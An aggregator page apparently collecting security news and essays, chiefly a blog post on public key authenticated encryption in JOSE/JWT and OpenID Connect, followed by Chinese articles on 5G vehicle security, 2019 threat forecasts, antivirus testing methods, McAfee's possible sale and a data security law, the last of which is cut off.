Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all 12749 articles
Browse latest View live

Public key authenticated encryption and why you want it (Part III)

$
0
0

InPart I, we saw that authenticated encryption is usually the security goal you want in both the symmetric and public key settings. InPart II, we then looked at some ways of achieving public key authenticated encryption (PKAE), and discovered that it is not straightforward to build from separate signing and encryption methods, but it is relatively simple for Diffie-Hellman. In this final part, we will look at how existing standards approach the problem and how they could be improved.

JOSE and JWT

The JSON Object Signing and Encryption (JOSE) standards, used for JWTs , define a number of encryption modes , both symmetric and public key. The symmetric modes all provide authenticated encryption, but the public key encryption modes typically do not. Even the ECDH-ES algorithms do not, as they follow the ECIES approach that we previously showed discards sender authentication.

This has led standards like OpenID Connect (OIDC) to mandate that its tokens must always be signed , and if encryption is desired then the tokens must be first signed and then encrypted. This has obvious downsides as the resulting nested JWT can be quite bulky, especially as the inner (signed) JWT is Base64-encoded and will then be Base64-encoded again after encryption. If you use RSA signatures and encryption (which are inexplicably still popular), the resulting JWT can easily become very large.

But does this nested JWT structure even achieve what we want? We saw inPart IIthat no simple composition of signing and encryption achieves PKAE. For example, if Alice sends a signed-then-encrypted message to Bob saying “You’re fired!”, then Bob can decrypt the message and then re-encrypt the signed inner message to Charlie. Charlie receives an apparently authentic message from Alice, clears his desk and leaves in tears, never to return. Naughty Bob!

The situation in JWT isn’t quite so bad though, as JWT defines a number of standard claims that can be used to prevent these attacks. In particular, the standard “iss” (issuer, like “from”) and “aud” (audience, or “to”) would make it very hard for Bob to pull off his nasty trick, as Charlie (or his mail reader) would see that the message was intended for Bob and not himself. These claims are mandatory in OIDC . If you are using JWTs, you should generally consider these claims to be mandatory too, even if the spec says they are optional. Failing to include them, or failing to check them, almost always leads to a security weakness.

Improving JOSE

JOSE consists of two parts: JWS provides digital signatures and MACs, while JWE provides encryption. This seems like a sensible split, but if we look at the security properties provided by individual algorithms, things become less clear:

Symmetric MAC algorithms provide message authentication and (strong) unforgeability. RSA and ECDSA signatures also provide third-party verifiability and potentially non-repudiation . The symmetric encryption algorithms all provide authenticated encryption. The public key encryption algorithms generally just provide some form of confidentiality, mostly IND-CCA2, except for RSA1_5 (which is an abomination).

This makes moving between algorithms, particularly switching between symmetric and public key algorithms, problematic as the security properties may change. As I mentioned in Part I, I have seen situations in which developers switched from symmetric encryption to RSA, without realising that they lost all authentication in the process. While this may seem obvious, the standard presents them all as valid encryption algorithms and makes them appear interchangeable.

Furthermore, when moving from simple JWS signatures or MACs to also requiring encryption, developers are suddenly faced with a lot more complexity to navigate on their own.

My proposal for improvement is that all the algorithms in JWE and JWS should be interchangeable. If they all shared the same security goals then this could be achieved. The idea in detail is that:

The security goal for JWE should be authenticated encryption in all cases, for both symmetric and public key. Algorithms that do not provide authenticated encryption (all of the current public key encryption algorithms) should be deprecated and eventually removed in favour of authenticated replacements. (Hey, I didn’t say this was going to be a popular proposal!) For JWS, we should concentrate on the stronger third-party verification and non-repudiation goals of a real (public key) digital signature. That means removing the HMAC algorithms from JWS.

I have argued in this three part series that authenticated encryption is a useful and achievable security goal for encryption. By deprecating/removing the non-authenticated public key encryption schemes, we can replace them with authenticated alternatives such as the Noise one-way authenticated patterns we discussed in Part II.

If all JWE modes are authenticated, then we can recommend that all applications default to using JWE rather than JWS. JWS can then be reserved for cases where you genuinely want the stronger properties provided by public key signatures, for example when messages convey legal or financial transactions.

But what if you really do just want an authenticated set of claims without confidentiality, as with the current HMAC JWS algorithms? One (poor) solution would be to just put your claims in the JWE protected header and leave the payload empty. This would work, as the protected header is authenticated and integrity protected, but it forces you to mix your application data with generic metadata. A better solution would be to allow a JWE to have two payloads: one public and one private. Both would have the same content-type, but one is encrypted while the other is only authenticated (as associated data in the sense of AEAD ). The JWE JSON encoding already allows such additional data in the form of the JWE AAD section, but this is currently missing from the compact encoding .

This is a useful idea in many cases anyway. Consider JWK , the standard for representing cryptographic keys as JSON documents. Currently all claims related to a key are stored in a single bag of attributes. This is problematic, as some of these claims are confidential (for instance private key material), while many are not, such as public key material or metadata including key IDs and usage constraints. Consider this example JWK for a X25519 key pair :

{ "kty": "OKP", "crv": "X25519", "x": "Mldalirlj1rJaZ88_sueClsTkOVrIgAukdp6WNEOxj8", "d": "F15VvXfZGXAg6mSzOeUw0RBb7hD6Fwb-NYj8qdy-9J4" }

Unless you are familiar with the specs or the details of elliptic curve cryptography, it may not be immediately obvious to you that the “d” claim here is actually the private key. The “x” claim is the (compressed) public key, which happens to be the x-coordinate of a point on the elliptic curve.

Mixing these all together in a single bag of attributes increases the chance of accidental disclosure of private key material, especially as JWKs are often published to publicly accessible HTTP endpoints. Imagine instead that all private/secret claims in a JWK were placed into separate public and secret key sections:

{ "kty": "OKP", "crv": "X25519", "public": { "x": "..." }, "secret": { "d": "..." }}

As a JWE, the same JWK could be written as follows, where public claims go in the “aad” block and the (encrypted) private key material in the “ciphertext” block:

{ "protected": { ... JWE Header ... }, "aad": { "kty": "OKP", "crv": "X25519", "public": { "x": "Mldalirlj1rJaZ88_sueClsTkOVrIgAukdp6WNEOxj8" } }, "ciphertext": "zuKfZSLQy7owFbuAY6W36V8SmK8W1yyuxP4uvYr2Sp2VAEmiYwEG..."}

The compact notation could also be extended to allow the extra public payload portion:

<header>.<encrypted-key>.<public>.<iv>.<private>.<tag>

With these changes, together with key-driven cryptographic agility , I think a JOSE 2.0 could start to be a much more robust standard with clearly defined security goals and fewer opportunities for mistakes.

OpenID Connect

We’ve already discussed how OpenID Connect (OIDC) mandates that ID Tokens are signed, and only optionally encrypted. So long as implementations follow the strict guidance on token validation in the spec, then I think the recommended signed-then-encrypted JWTs are reasonably secure. However, it is a shame that encryption is only an optional requirement, while signatures are mandatory. I believe this is largely because of the difficulties of combining encryption with signatures we have discussed, and the resulting bloating of the JWT size caused by nested signed-then-encrypted structures with multiple layers of Base64-encoding.

But this default is almost exactly the opposite of what you would want. ID Tokens quite regularly contain sensitive information about users: names, email addresses, even dates of birth or postal address information. You absolutely want these to be encrypted in most cases . On the other hand, I suspect very few people care about non-repudiation of ID Tokens. Indeed, I suspect very few implementations bother to keep the ID Token around at all after authentication has completed, let alone store it away as evidence for future legal proceedings.

This is very much a case in which the security requirements at the application layer are for authentication (of course!) and confidentiality . But we don’t get that by default because PKAE is difficult to achieve in JWTs. If PKAE modes were the norm in JWE then ID tokens could be encrypted and authenticated by default, and only signed in the rare cases that you need the additional assurances.

Authenticated API requests

There has been some interest in providing authenticated HTTP requests for enhanced API security. For example, Amazon famously requires HMAC-signed requests for AWS API calls, and there are a couple of proposals for adding signed requests to OAuth 2.0. The reasons for wanting signed API requests over and above the protections provided by HTTPS are usually given in terms of stronger authentication and integrity guarantees. None of the three documents linked above mentions non-repudiation or 3rd-party verifiability.

Most APIs really care about (data origin) authentication and authorization did this request come from an authorised, trusted source? Using public key signatures for this is using a sledgehammer to crack a nut. There is a reason why TLS only uses signatures during the handshake, they are expensive to compute and verify. So using genuine signed requests is very expensive in practice. To get around this, most “signed” requests, like Amazon’s, actually use symmetric HMAC authenticators instead. But this negates some of the advantages of signed requests, as both parties must know the shared secret. If we want to move away from pure bearer tokens for OAuth, partly because we are worried about the impact of compromised API servers, then a solution that requires the server to store recoverable copies of all client keys doesn’t seem like much of an improvement.

Contrast this with some of the Diffie-Hellman PKAE systems we have seen in this series. Here we get a genuine public key approach, but crucially the client (and server) can cache and reuse a derived symmetric key for multiple requests. This gives us the speed of symmetric cryptography, with the least-authority of public key: the server shouldn’t need to store client’s secret keys, and with PKAE it doesn’t.

Furthermore, as requests are now encrypted, we can gain real end-to-end encryption and authentication of requests. This provides defence in depth against failures at the TLS layer, and avoids the shortcomings of point-to-point authentication evident in this recent critical Kubernetes vulnerability . If API requests in Kubernetes were strongly authenticated and authorized at the application level, rather than merely authenticated at each hop at the transport level (TLS), then this potentially catastrophic vulnerability might have been avoided.

Of course, there are cases where you might really want the stronger guarantees of a real signature financial transactions for example. But those cases are the exception rather than the norm.

Summary

I have argued in this series that the right default security goal for most applications is authenticated encryption . While this goal is now widely accepted for symmetric cryptography, it is still relatively rarely adopted in the public key setting. Hopefully the examples I have given will go some way to promoting that goal.


Some Random Thoughts From Security Field Day

$
0
0

I’m spending the week in some great company at Security Field Day with awesome people. They’re really making me think about security in some different ways. Between our conversations going to the presentations and the discussions we’re having after hours, I’m starting to see some things that I didn’t notice before.

Security is a hard thing to get into because it’s so different everywhere. Where everyone just sees one big security community, it is in fact a large collection of small communities. Thinking that there is just one security community would be much more like thinking enterprise networking, wireless networking, and service provider networking are the same space. They may all deal with packets flying across the wires but they are very different under the hood. Security is a lot of various communities with the name in common. Security isn’t about tools. It’s not about software or hardware or a product you can buy. It’s about thinking differently. It’s about looking at the world through a different lens. How to protect something. How to attack something. How to figure all of that out. That’s not something you learn from a book or a course. It’s a way of adjusting your thinking to look at problems in a different way. It’s not unlike being in an escape room. Don’t look at the objects like you normally would. Instead, think about them with unique combinations that get you somewhere different than where you thought you needed to be. Security is one of the only IT disciplines where failure is an acceptable outcome. If we can’t install a router or a wireless access point, it’s a bad job. However, in security if you fail to access something that should have been secured it was a success. That can lead to some very interesting situations that you can find yourself in. It’s important to realize that you also have to properly document your “failure” so people know what you tried to do to get there. Otherwise your success may just be a lack of proper failure. Tom’s Take

I’m going to have some more thoughts from Security Field Day coming up another time. There’s just too much to digest at one time. Stay tuned for some more great discussions and highlights of my first real foray in the security community!

Document worth reading: “Small Sample Learning in Big Data Era”

$
0
0

As a promising area in artificial intelligence, a new learning paradigm, called Small Sample Learning (SSL), has been attracting prominent research attention in the recent years. In this paper, we aim to present a survey to comprehensively introduce the current techniques proposed on this topic. Specifically, current SSL techniques can be mainly divided into two categories. The first category of SSL approaches can be called ‘concept learning’, which emphasizes learning new concepts from only few related observations. The purpose is mainly to simulate human learning behaviors like recognition, generation, imagination, synthesis and analysis. The second category is called ‘experience learning’, which usually co-exists with the large sample learning manner of conventional machine learning. This category mainly focuses on learning with insufficient samples, and can also be called small data learning in some literatures. More extensive surveys on both categories of SSL techniques are introduced and some neuroscience evidences are provided to clarify the rationality of the entire SSL regime, and the relationship with human learning process. Some discussions on the main challenges and possible future research directions along this line are also presented. Small Sample Learning in Big Data Era

Advertisements

5G时代很可能让自动驾驶汽车网络安全性降低

$
0
0

网络安全巨头Avast公司的高级研究员Martin Hron称,第五代移动网络很可能让无人驾驶汽车比目前更容易遭遇攻击。在接受《安卓头条》网站的采访时,Hron承认目前很难预测5G对策对于无人驾驶汽车领域产生的直接影响。但是他推测,一旦这项技术大规模推广,安全状况只会变得更糟。

这位业界专家声称:“现在还说不准,但是极有可能的是,无人驾驶汽车更多的部件和系统借助5G网络与外部世界连接时,会增加受攻击的范围。”

网络安全领域的发展仍然拭目以待,人们更多的开始关注即将到来的无线革命和它如何应用于新兴的无人驾驶领域。虽然更多的网络连接不可避免的会导致无人驾驶技术安全性降低,但是无人驾驶汽车领域的情况似乎并非如此糟糕。Hron声称:“我们认为,汽车制造业,尤其是智能汽车和无人驾驶汽车行业是唯一安全性较高的行业,因为安全研究人员进行的研究、有记录的缺陷和概念验证都超过了真正的攻击案例。”


5G时代很可能让自动驾驶汽车网络安全性降低

据Avast公司的这位专家称,汽车制造业需要借助现有的研究保持这种安全优势并且领先于黑客的攻击技术,以此完善包含无人驾驶在内的车辆网络安全机制。Hron警告称,在最初的产品设计阶段就必须将安全防护详细化。而且汽车制造业已经采取了一些措施,比如说目前流行的CAN总线系统安全性较低,因此它即将被一种新的系统标准所取代。

即使今天的联网车辆正在利用人工智能(AI)解决这一安全问题,而且在即将到来的无人驾驶汽车技术中,AI将成为日常交通运输不可分割的一部分。Hron解释称,AI软件的安全性未必会高于传统的程序,因为其复杂性会带来新的攻击漏洞。

比如说,无人驾驶汽车的计算机视觉感知会被精心设计的视觉图像所欺骗,导致汽车停车,但是这种攻击尚未证实能够带来真正的风险。然而,以AI为基础的无人驾驶技术更像一种计算机系统或者计算机网络,而不是单一的实体,因此它们可攻击的范围更大,这也会导致黑客寻找漏洞的成功率更高。

这位安全专家过去就曾发出警告称:“5G网络的到来、物联网方案以及下一场无线革命带来的所有变化都要求Waymo等汽车制造商采取更多的行动,以此确保它们未来的产品尽可能的安全。”

更多的行动事实上可以从多个方面进行解答。但汽车制造业至少应当关注的是限制无人驾驶汽车的网络通讯范围,以此减少可能的攻击漏洞。正如许多专家之前所提出的,无人驾驶汽车的网络安全仍然处于一种起步阶段。

2019年五大网络威胁走势预测

$
0
0

临近2019,网络世界逐渐变得不太平起来,或许是黑客们开始冲业绩了,又或许是快发年终奖了安全人员们都松懈了?总的来说,大大小小的安全事件,瞬间刷爆了我们的屏幕。作为安全从业者,已经发生的事我们无法改变,只有及时查漏补缺,引以为戒。

为了管理日益分散且复杂的网络环境,越来越多的高新科技涌现了出来,但科技着实是把双刃剑,在完成产业数字化革新的同时,也为网络攻击者们提供了更丰富的武器选择,比如AI技术。随着人工智能的发展壮大,越来越多的AI技术被应用于生活生产中的方方面面。曾有专家预测,未来的网络安全中AI的参与度会非常高,甚至能够革新整个安全行业。但不幸的是,黑客们也这么认为。总的来说,时下的网络犯罪与网络安全已然在往相同的方向发展。

Fortinet根据当前的网络状况对2019年的网络威胁做了一番预测,列出了五种值得关注的威胁:

1.AI Fuzzing

fuzz也就是我们常说的模糊测试,模糊测试是安全人员在安全测试中常用的技术之一,一般用于发现硬件和软件接口以及应用程序中的漏洞。能够通过将无效、意外或随机的数据注入程序或接口中,然后监控是否出现崩溃、跳转、弹出等现象,能够有效的查找潜在的内存泄露、代码故障等问题。


2019年五大网络威胁走势预测

由于在AI领域中,威胁载体目前可以定义为未知状态,所以也会有大量的0day存在,在这种情况下,使用模糊测试也许会有意想不到的结果。尽管使用fuzz技术查找0day这种方法现在并不被重视,但随着人工智能和机器学习应用的普及,fuzz也许会因其高效的特点,再次成为黑客手中的香饽饽。

2.0day漏洞的持续利用

尽管现在存在大量的已知漏洞,但实际上真正被黑客使用的只有不到6%,但出于安全的角度考虑,任何一个安全工具都必须要做到全面覆盖,因为无法确定攻击者会利用哪一个漏洞。随着潜在威胁的不断扩大,对安全工具的性能要求也不断提升。


2019年五大网络威胁走势预测

虽然现在存在一些如零信任安全架构的框架,能够提供一些有效的帮助,但毕竟刚刚起步,并没有大量使用。也就是说,在这种问题面前,多数个体、组织都没有对即将到来的新一代威胁做好准备。传统的安全防护机制只能够修复已知的问题,但针对未知的安全威胁的探测十分有限。随着现在的网络攻击频率逐渐增加,仅仅是防护必然是不够的,或许某一天连沙盒都不够用了。

3.僵尸网络

什么是群体活动,举个例子,僵尸网络就是最大的群体活动。随着高新技术的发展,越来越多的恶意活动表现出了集群性质的特点。僵尸网络可以随意在协同或自主的状态间切换,这也是为什么多数网络防御措施在僵尸网络面前都显得不堪一击。最重要的是,像是利用0day采矿一样,僵尸网络的大量存在很有可能对日后的犯罪模式产生影响。


2019年五大网络威胁走势预测

目前来说,网络犯罪的生态系统是由人来驱动的。再专业的黑客也需要花钱来发现、打造或利用所需要的漏洞,甚至像勒索软件供应商这类服务也需要有专业的黑客作为资源支持。但是,如果出现能够提供自主学习的环境时,黑客、服务供应商、客户之间的交互将大幅降低,这又进一步增加了防护的难度以及提高了他们的盈利能力。

4.重点攻击
2019年五大网络威胁走势预测

在虚拟网络中,经常会选择根据不同的需求分配资源、带宽,实时选择或更改启动或关闭虚拟机,以解决资源紧张的问题。同样,套用在网络安全领域中,在攻击过程中可以重新分配网络中的资源以完成重点打击任务。入侵网络如同钻孔打洞,在严防死守的网络防护体系下寻找漏洞。在攻击过程中,黑客可以通过预编程来设定资源分配的性质,从而使其自主完成网络攻击行为。

5.机器学习

机器学习被视为当前最有前途的网络安全工具之一,因其能够训练设备以及自主执行特定任务,例如应用行为分析。能够在面对网络威胁的时候主动分析其复杂性并采取有效的对策。相对于传统的手动修复,机器学习大大减轻了安全人员的工作负担。


2019年五大网络威胁走势预测

但有利就有弊,机器学习以其高效的学习、执行效率得到了多数技术人员的青睐,但不要忘了,黑客的本质也是技术人员,机器学习强大的学习能力以及无自主意识的弊端也因此显现了出来:黑客可以通过入侵机器学习的过程,直接更改设备设定或行为,将其占为己有。

为日后的威胁做准备

通过对一些具有前瞻性的网络威胁做一定的了解,对于网络安全来说有益无害,网络世界的格局不断在改变,黑客的攻击手段决定了我们的安全策略。鉴于当今全球威胁的走势,组织机构必须对发生的威胁迅速做出反应以尽可能的减少损失。或许高新技术如AI如机器学习能够帮助我们改善被动的安全局面,但目前网络防护的根本,还是需要广大网络安全工作者的支持。

以上就是Fortinet对2019年网络威胁走势的预测,或许听起来晦涩难懂,但是出于安全考虑,多听多看多了解,总没有什么坏处~

*参考来源: darkreading ,Karunesh91编译,转载请注明来自CodeSec.Net

目前市场上的网络安全产品都是如何进行内测的?

$
0
0

在20世纪90年代的中后期,对网络安全的产品测试需求几乎与第一个防病毒程序的开发同时出现,最开始,是一些计算机安全方面的杂志,利用自制的方法来对一些要报道的安全解决方案的有效性进行验证,往后慢慢地,就出现了一个个专业的安全测试公司来使用全面的测试方法来进行各种相关的检测。

最开始的测试方法就是,从各个计算机上提取一些所谓的恶意文件进行扫描测试,但是由于这种测试的样本和测试结果都非常的不可靠,所以一直被网络安全的解决商所批评,很少有人相信这种方法所测试出来的结果。

20多年过去了。虽然网络安全保护的解决方案在经历了很大的发展,但是网络威胁的威力也越来越大了。反过来,这也加快了相应的测试方法的改进。让那些公司不断的设计出最安全和最准确测试方法。不过这个过程不管是从成本的角度还是从技术的角度来讲都极其的困难,这就是为什么现在安全产品的测试质量取决于实验室的财务状况和其积累的专业知识(比如卡巴斯基实验室的情况)。

关于测试的成本:事实是,独立测试是评估其测试结果的公平,有效的唯一方法。比如NCAP(New Car Assessment Program) 就是一个民间组织,不同于那些由政府机构组织实施的强制性安全认证,它有着自己标准。所以安全产品的测试公司,就得耗费巨资来获得各个开发者的认可。

不过现在这个问题目前正在慢慢地解决,因为网络安全行业本来就是基于网络的产品,所以通过机器学习可以有效的降低很大的成本。所以未来的基于机器学习的检测结果将会越来越普及。

安全产品的基本测试方法

按需扫描(ODS):ODS是最开始使用的测试实方法,用于测试的实验室会收集所有类型的恶意程序(主要是已经感染了恶意软件的文件 ,现在主要是木马程序),将它们添加到用于测试的文件中,然后启动有要测试的安全产品对整个文件进行测试。如果测试的产品捕获的恶意程序越多,就认为它越好,为了接近实战效果,在测试过程中,测试者会将文件从一个文件夹复制到另一个文件夹,看看交叉感染的测试效果。

但目前大部分比较高级的安全技术根本就不适用于这种类型的测试,这也就意味着无法评估解决方案有效地应对威胁的效果。不过,ODS通常会结合一些更为更先进的方法来实施检测。

执行测试(On-execute test):这是ODS之后发展的一项测试技术。在安全软件正在运行的机器上复制并启动样本集合,并记录安全解决方案的反应。这曾经被视为一种非常先进的技术,但其缺点很快在实践中显露出来。因为现在的网络攻击往往是分几个阶段进行的,而恶意文件只是攻击的一部分。例如,攻击样本要等待命令行参数,才能在特定环境,例如,特定浏览器中运行,或者攻击样本可以是连接到主木马的DLL形式的模块,比如DLL木马(一种动态嵌入式木马)。

现实测试(RW):这是目前最复杂的测试方法,但也最接近现实攻击环境,现实测试会模仿感染程序的整个周期。测试人员在安装了安全解决方案的干净系统上打开通过电子邮件传送的恶意文件,或者通过浏览器跟踪实际的恶意链接,以检查整个感染链是否在正常工作,或者看正在测试的解决方案是否能停止恶意攻击过程的哪些阶段。

这种测试考虑了安全产品在真实的网络环境中可能遇到的各种问题。

然而,这种测试方法需要严格的准备工作。首先,需要大量的机器及大量的时间对超过一百个或更多的样品进行全面测试,这是少数实验室所能承受的。其次,目前的许多木马可以识别出它们是否是在虚拟环境中运行,如果是,它们则不会运行,它们会阻碍任何试图分析它们的工作。因此,为了获得最可靠的结果,测试实验室必须使用实际带有物理地址的计算机来运行,在恶意软件样本运行后在重新启动安全产品进行测试。

另一个困难是需要生成用于测试的大量恶意链接数据库。因为许多恶意链接会在测试完后,直接消失,根本起不到实际的测试效果,所以RW测试的质量在很大程度上取决于实验室是否可以找到具有实际检测效果的恶意链接。

主动的网络行为检测(Behavior or proactive test):这个思路就是要对未知的样本来进行。为此,进行测试的安全产品,要不断地进行更新。然后,在最后一次更新后,对所出现的恶意程序进行样本汇总,然后再执行按需扫描和执行测试。一些测试公司打包或模糊已知的威胁,以测试安全解决方案识别恶意行为的能力。不过很难正确地评估这种测试的结果,因为,一些实验室会为了保持所收集样本的特性而在完全断网的测试机上进行检测,但是在实际的环境中,病毒是会发生变异的,所以这种测试完全不可行。

删除或修复测试(测试是否完全删除了恶意软件):这是为了检查安全产品对恶意程序的实际处理能力,即清除自动运行密钥,删除任务调度程序和恶意软件活动的其他痕迹。这是一个重要的测试,假若删除不干净,可能会让恶意程序死灰复燃。在测试期间,干净的系统会先被所收集的恶意软件样本所感染,然后让安全产品进行查杀,完了之后,重新启动计算机,并安装具有最新更新的安全产品进行检测。这个测试可以进行单独一部分测试或作为RW测试的一部分。

性能测试:此测试是为了评估安全产品是如何有效地使用计算机系统资源的。为此,在安装和运行安全产品的情况下,要对计算机平时运行的各种操作速度进行测量。这些操作包括系统引导,文件复制,归档和解压缩以及应用程序的启动,一句话,就是模拟真实用户的工作场景。

假阳性测试(False positive test):该测试对于确定最终评估的可靠性是非常必要的。显然,机器学习,特别是未受监控的机器学习,将不可避免地创造假阳性。这些假阳性将必须通过人类予以纠正,安全产品可能对测试中的恶意程序进行100%的甄别,但在实际的环境中,安全产品必须对合法应用的反应作出评判。为此,要使用不同的方案来创建和测试常用软件。

反馈:这不是测试方法,而是任何测试都要经过的最重要的阶段,没有它,结果就不能被验证。在执行所有测试之后,实验室将产品实现的初步结果发送给相应的供应商,以便他们可以检查并识别产品的漏洞。这是非常重要的,因为测试实验室根本没有资源来检查每一个情况,并且测试中的错误也是不可避免的。这些错误不一定是由测试方法论引起的,例如,在RW测试期间,应用可以成功地绕过检测设备,但是不执行任何恶意动作,因为它没有碰到恶意运行的环境或者其最初不是恶意的,而是用于广告目的,但是这些运行都是在安全产品安全后所发生的,所以会影响到最终的效果评判。同时,安全解决方案旨在阻止恶意操作。然而,在这种情况下,并没有发生恶意操作,而反恶意软件程序还依然按照最初的设计在运行,所以碰到这种情况只能通过分析恶意样本的代码及其行为来处理了。

针对安全产品的特定性能进行测试

这种方法是用于深入测试特定类型的威胁或特定安全技术的方法。许多安全产品的开发商需要知道哪种安全解决方案对加密系统的保护最有效,例如,哪种产品对网上银行系统提供了最佳保护。在这种情况下,对安全解决方案的整体性评估就不是很有代表了,因为这个测试结果只是显示一个产品“不比其他产品差”而已。这还不够,所以一些测试实验室还进行了专门的测试。

漏洞测试:对付网络攻击比检测出恶意软件样本更困难,并不是所有的安全解决方案都能成功对付网络攻击的。为了评估安全产品的防御技术,实验室会使用RW测试:测试人员会收集大量的恶意数据链接包,在干净的机器上跟踪它们,记录流量并在测试中为所有反恶意软件解决方案重现这些恶意数据包的攻击过程。为了使实验尽可能的干净,一些公司,除了真正的漏洞利用包外还会使用Metasploit框架创建自己特有的漏洞,这样就可以测试安全解决方案对未知代码软件漏洞的反应了。

金融威胁测试:网上银行和银行客户端系统是网络犯罪分子攻击最多的地方,所以测试人员会使用许多特定技术,例如,替换网页内容或远程系统管理,并且还会检查安全解决方案如何对抗它们。此外,许多安全产品的开发商还会提供专门的安全技术来防范金融威胁,例如,卡巴斯基的SafeMoney,SafeMoney的有效性也会通过这些测试来进行检查。

特殊平台:绝大多数测试都是在最常用的平台上进行的, 比如windows。然而,安全产品的开发商有时对其他平台上的安全解决方案更感兴趣,比如,Android,linux,Mac OS,Windows服务器,移动操作系统,甚至早期的Windows版本(例如,大多数ATM目前仍然使用Windows XP)。

针对安全产品的测试类型

除了测试方法,测试也会因测试类型而异。一般情况下,安全产品都是单独进行测试,比如对卡巴斯基进行测试完后再对AntiVirus进行检测,不过这么测试仅仅只是一个相对的结果,比不出哪个产品更好,所以有时会对几种安全产品一起测试,比如对卡巴斯基和AntiVirus同时进行测试,看看他们对同一恶意程序的反应,但是这种比较测试会耗费更多的测试资源,但能为开发商和用提供更多信息。

另外还和测试的频率与测试结果的评价方法有关。大多数测试公司进行会六个月进行的一次测试。每一次测试的结果都会独立评价,在一个测试中可以高度评价的解决方案,可能会在下一个测试中,可以评价很低,反之亦然。除了安全产品本身的特征之外,还取决于测试使用的样本集合或测试的方法。

如果是在连续测试的情况下,会累积给出综合评价,例如,有的安全产品会每个月进行一次测试,这样每六个月综合评价一次,这样的测试最具准确性。所以对消费者最重要的和对开发商最重要的就是连续测试。只有“远距离比赛”的结果才能够评价产品的各种测试结果与各种样本的集合,并对产品做最后的定论。

连续测试能评估一个产品以前和当前版本的各种区别,并能预测未来可能会发生什么反应。连续测试表明了这个安全产品是在不断的更新,不仅样本数据库在更新而且代表着开发人员也在密切关注不断变化的安全形势并对变化做出响应。

安全产品测试市场的概况

目前,市场上出现了许多与安全产品测试相关的公司。这无疑对行业发展有利,因为他们每个都各有擅长的方面,来自不同实验室的评估会让安全产品得到全方位的评价:

AV:这家奥地利公司是测试市场上最早的公司之一。它专注于B2B的安全解决方案,并利用自己的病毒样本执行一系列测试,包括RW测试。测试会持续进行10个月,然后对最好的安全产品授予年度最佳的称号。每年一次,其测试人员就是使用ODS,OAS和On-Execute方法测试针对Android和Mac OS的安全解决方案。

AV-TEST:成立于20年前的一家德国公司,目前是该市场最大的公司。它每月进行一次比较RW测试,测试结果每两个月提供一次;它还使用ODS + ODS + OES方法即样品被扫描,运行后并再次扫描。AV-TEST还会对Android进行性能测试,每年两次使用ODS方法测试针对Mac OS的安全解决方案。

MRG:总部设在英国,该公司自2009年以来一直在测试安全产品。它专门从事神队的技术测试,并进行季度比较RW测试(360评估)。 MRG还会测试金融威胁比如网上银行测试和漏洞预防测试,另外该公司还会执行各种按需测试。

SELAB:由前DTL员工Simon Edwards创办,该公司是在框架基础上设计了自己的一套攻击测试体系,进行季度RW测试,包括防御测试。

Virus Bulletin:该公司使用静态WildList(在野病毒列表)进行非常简单的基于ODS方法的测试认证,可供开发商下载。它还执行安全产品的主动行为测试,但目前其数据库已经几个月没有更新了。

ICSA:这个美国公司是Verizon的一个部门,它只执行认证测试和抗APT的安全解决方案的测试。

NSS Labs:一家美国公司,专注于公司业务。该公司包括RW测试,防御测试和抗APT的安全解决方案的测试。

杂志和网络出版商:如PC Magazine(美国著名的IT杂志),ComputerBild,Tom’s Hardware Guide等,也进行了自己的防病毒测试。然而,他们的方法不是很透明,而且他们也没有公开他们的恶意软件样本集。

除了上述市场参与者之外,还有许多应安全产品开发商而进行非常规测试的公司。不过,在查看其评估结果时应当小心,它们的方法通常不透明,并且比较测试的对象也不会公布。应当指出,高质量的测试方法是一个复杂而昂贵的过程,需要大量的资源和专业知识。只有这样的测试才能为安全产品提供有价值的参考。

网络安全公司McAfee或再遭出售 私募或超42亿美元接手

$
0
0
[ 摘要 ]私募公司Thoma Bravo正在收购McAfee的事宜进行初步讨论,收购价格远高于该公司在2016年时42亿美元的估值。
网络安全公司McAfee或再遭出售 私募或超42亿美元接手

腾讯科技讯 据外媒报道,据知情人士透露,私募公司Thoma Bravo正在就从德太投资(TPG)和英特尔手中收购安全软件公司McAfee的事宜进行初步讨论,收购价格远高于该公司在2016年时42亿美元的估值。

这些人士说,谈判可能仍会破裂,预计不会很快宣布交易。由于讨论是私下的,他们要求不具名。

McAfee由约翰迈克菲(John McAfee)于1987年创立,为个人计算机和服务器开发网络安全软件,保护用户免受恶意软件和其他病毒的侵害。这种类型的计算机安全可防止对个人设备的攻击。最近,McAfee的业务扩展到移动设备和云计算,而这正是黑客迁移的地方。

直到2010年英特尔以76亿美元收购McAfee之前,该公司一直是一家上市公司。英特尔希望把其芯片与McAfee的安全技术紧密结合。对于英特尔而言,这一愿景并没有实现。2016年,英特尔宣布以42亿美元的估值将51%的业务出售给德太投资,当时该公司被砍掉了逾30亿美元的资金。几个月后,德太投资邀请Thoma Bravo对McAfee进行了少数股权投资。

德太投资的多数股权帮助McAfee业务在不到两年的时间里通过收购实现了转型。今年1月,McAfee完成了对SkyHighNetworks的收购,后者帮助企业监控员工正在使用哪些云服务。今年3月,McAfee还收购了Tunnelbear,该公司提供虚拟专用网络,在使用共享WiFi帐户时保护数据。

据一位知情人士透露,英特尔现在将自己视为McAfee的纯粹金融投资者。尽管如此,英特尔通过持有其少数股权,参与了最近独立的McAfee的价值创造,如果与Thoma Bravo交易成功,它将收回部分损失的价值。两位知情人士说,该协议将统一McAfee的所有权,并可能使其重新上市。

路透社在11月报道称,Thoma Bravo已与赛门铁克接洽,提出收购要约。其中一位知情人士说,与McAfee的交易将排除收购赛门铁克的可能性。截至目前,德太投资和英特尔的发言人拒绝置评。Thoma Bravo的发言人没有立即作出回应。(腾讯科技审校/明轩)

数字经济大潮来临:数据安全凛冬中的数据安全法

$
0
0

数字经济大潮来临:数据安全凛冬中的数据安全法

在寒冷的冬日,回首2018年的全球数据安全大势,一种“凛冬已至”的感觉油然而生。从年初Facebook 8700万名用户数据被不法用于政治目的,到年底万豪酒店喜达屋系统中高达5亿个人数据被窃,从年初旨在跨境调取数据的美国《海外数据使用权明确法》(Clarifying Lawful Overseas Use of Data Act),到年中以长臂管辖为特色的欧盟《一般数据保护条例》,数据的安全风险和政治挑战层出不穷。恰恰在此背景下, 中国在2018年纳入立法计划的《数据安全法》才有了别样意义。在此《数据安全法》起草的重要关口,我们不妨借箸代筹,就其定位、宗旨、立场等核心议题略做构想。

“大数据安全法”还是“小数据安全法”?

《数据安全法》的体系定位是立法的前提性问题。从调整对象和立法目的观察,《数据安全法》可以采取两条不同的进路:

